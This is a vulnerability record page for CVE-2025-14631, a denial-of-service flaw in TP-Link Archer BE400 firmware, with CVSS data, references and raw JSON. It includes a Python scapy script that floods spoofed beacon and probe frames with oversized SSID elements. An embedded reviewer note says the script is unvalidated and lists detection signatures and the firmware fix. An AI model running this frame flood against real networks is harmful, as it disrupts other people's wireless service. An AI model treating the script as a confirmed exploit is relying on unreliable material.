Security Vulnerability Report
CVE-2025-14631 CVSS 6.5 MEDIUM

CVE-2025-14631

Published: 2026-01-07 12:16:56
Last Modified: 2026-03-12 19:29:26
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

A NULL Pointer Dereference vulnerability in TP-Link Archer BE400 V1 (802.11 modules) allows an adjacent attacker to cause a denial-of-service (DoS) by triggering a device reboot. This issue affects Archer BE400: xi 1.1.0 Build 20250710 rel.14914.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_be400_firmware:*:*:*:*:*:*:*:* (versions up to and including 1.1.0) - VULNERABLE
cpe:2.3:h:tp-link:archer_be400:-:*:*:*:*:*:*:* (hardware platform the firmware entry above runs on) - NOT VULNERABLE
TP-Link Archer BE400 V1 xi 1.1.0 Build 20250710 rel.14914

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14631 PoC - TP-Link Archer BE400 NULL Pointer Dereference DoS
Note: This PoC is for educational and security research purposes only.
Author: Security Research

Reviewer notes:

* NOTE(review): nothing on this page shows that the frames built here reach
  the NULL dereference. The CVE description names only "802.11 modules", and
  the script carries no test result. Treat it as an unvalidated sketch: a
  device that survives it is not thereby shown to be patched. Confirm
  exposure from the installed firmware build instead (the record lists
  firmware up to and including 1.1.0 as affected).
* Remediation is a firmware update; the record's references point to the
  vendor advisory at https://www.tp-link.com/us/support/faq/4871/.
* What the script puts on the air: broadcast beacons that use the target's
  MAC as transmitter and BSSID, plus probe requests from a fixed source
  address, both carrying an all-NUL SSID element far longer than the
  32 octets 802.11 allows. A wireless IDS can alert on either property:
  oversized SSID elements, or a sustained burst of management frames
  claiming an AP's own BSSID.
"""

import sys
# `socket` and `struct` are imported but never referenced in this script.
import socket
import struct
import time
from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11ProbeReq, Dot11Elt, sendp


def create_malicious_frame(bssid, channel):
    """
    Build one broadcast 802.11 beacon with an oversized all-NUL SSID element.

    Args:
        bssid: MAC address string placed in both the transmitter (addr2) and
            BSSID (addr3) fields. The caller in this file passes the target
            device's MAC, so the beacon claims to originate from the target.
        channel: integer written into the DS Parameter Set element.

    Returns:
        The scapy packet (RadioTap / Dot11 / Dot11Beacon / three Dot11Elt).
    """
    # Unused: the beacon below constructs its own RadioTap() layer.
    radio = RadioTap()

    # 256 NUL characters. The 802.11 SSID element is limited to 32 octets,
    # so this length alone is a usable detection signature.
    ssid = "\x00" * 256  # Malformed SSID to trigger vulnerability

    # type=0/subtype=8 is a management beacon; addr1 is the broadcast address.
    # The Rates element holds eight rate bytes; DSset advertises `channel`.
    beacon = RadioTap() / \
             Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", \
                   addr2=bssid, addr3=bssid) / \
             Dot11Beacon(cap=0x2104) / \
             Dot11Elt(ID="SSID", info=ssid) / \
             Dot11Elt(ID="Rates", info=b'\x82\x84\x8b\x96\x0c\x12\x18\x24') / \
             Dot11Elt(ID="DSset", info=chr(channel))

    return beacon


def send_flood_attack(interface, target_mac, channel, duration=30):
    """
    Transmit beacon and probe-request frames back to back for `duration` seconds.

    Args:
        interface: name of the wireless interface handed to scapy's sendp().
        target_mac: MAC string forwarded to create_malicious_frame() as bssid.
        channel: integer forwarded to create_malicious_frame().
        duration: wall-clock run time in seconds (default 30).

    Returns:
        None. Progress and the final frame count are printed to stdout.
    """
    print(f"[*] Starting NULL Pointer Dereference attack on {target_mac}")
    print(f"[*] Target Channel: {channel}")
    print(f"[*] Attack Duration: {duration} seconds")

    # Sets scapy's default interface to `interface`. The bare `except: pass`
    # hides every failure here, KeyboardInterrupt included.
    try:
        from scapy.all import conf
        conf.iface = interface
    except:
        pass

    start_time = time.time()
    packet_count = 0

    # No delay between iterations: each pass sends one beacon and one probe
    # request, so the loop emits frames as fast as sendp() returns. That
    # sustained management-frame rate is itself observable by a wireless IDS.
    while time.time() - start_time < duration:
        # Beacon claiming the target's MAC as its BSSID.
        frame = create_malicious_frame(target_mac, channel)
        sendp(frame, iface=interface, verbose=0)
        packet_count += 1

        # Broadcast probe request (subtype=4) from a fixed source address,
        # with a 128-character all-NUL SSID element.
        probe_req = RadioTap() / \
                    Dot11(type=0, subtype=4, addr1="ff:ff:ff:ff:ff:ff", \
                          addr2="00:11:22:33:44:55", addr3="ff:ff:ff:ff:ff:ff") / \
                    Dot11ProbeReq() / \
                    Dot11Elt(ID="SSID", info="\x00" * 128)
        sendp(probe_req, iface=interface, verbose=0)
        packet_count += 1

        # The counter rises by two per pass, so this prints every 100 frames.
        if packet_count % 100 == 0:
            print(f"[*] Sent {packet_count} malicious frames...")

    print(f"[+] Attack completed. Total packets sent: {packet_count}")


def main():
    """
    Parse command-line arguments and start the frame loop.

    Requires an interface and a MAC address; channel defaults to 6 and
    duration to 30. With fewer than two arguments it prints usage text and
    exits with status 1. The MAC string is not validated, and a non-numeric
    channel or duration makes int() raise ValueError.
    """
    if len(sys.argv) < 3:
        print("Usage: python3 cve-2025-14631-poc.py <interface> <target_mac> [channel] [duration]")
        print("Example: python3 cve-2025-14631-poc.py wlan0mon 00:11:22:33:44:55 6 30")
        sys.exit(1)

    interface = sys.argv[1]
    target_mac = sys.argv[2]
    channel = int(sys.argv[3]) if len(sys.argv) > 3 else 6
    duration = int(sys.argv[4]) if len(sys.argv) > 4 else 30

    print("=" * 60)
    print("CVE-2025-14631 - TP-Link Archer BE400 NULL Pointer Dereference")
    print("=" * 60)

    send_flood_attack(interface, target_mac, channel, duration)


if __name__ == "__main__":
    main()

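References

- https://www.tp-link.com/us/support/faq/4871/ (Vendor Advisory)
- https://www.tp-link.com/en/support/download/archer-be400/v1/#Firmware (Product)
- https://www.tp-link.com/us/support/download/archer-be400/#Firmware (Product)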

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14631", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-01-07T12:16:55.953", "lastModified": "2026-03-12T19:29:26.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL Pointer Dereference vulnerability in TP-Link Archer BE400 V1(802.11 modules) allows \n\nan adjacent attacker to cause a denial-of-service (DoS) by triggering a device reboot.\n\nThis issue affects Archer BE400: xi 1.1.0 Build 20250710 rel.14914."}, {"lang": "es", "value": "Una vulnerabilidad de desreferencia de puntero NULL en TP-Link Archer BE400 V1 (módulos 802.11) permite a un atacante adyacente causar una denegación de servicio (DoS) al desencadenar un reinicio del dispositivo.\n\nEste problema afecta a Archer BE400: xi 1.1.0 Build 20250710 rel.14914."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_be400_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.1.0", "matchCriteriaId": "EF7F8CFB-8A5E-4FF0-9878-5F1DD950429E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_be400:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6C45AEB-1B3B-4844-81A2-3D12E459C2FA"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/archer-be400/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/download/archer-be400/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/4871/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor 
Advisory"]}]}}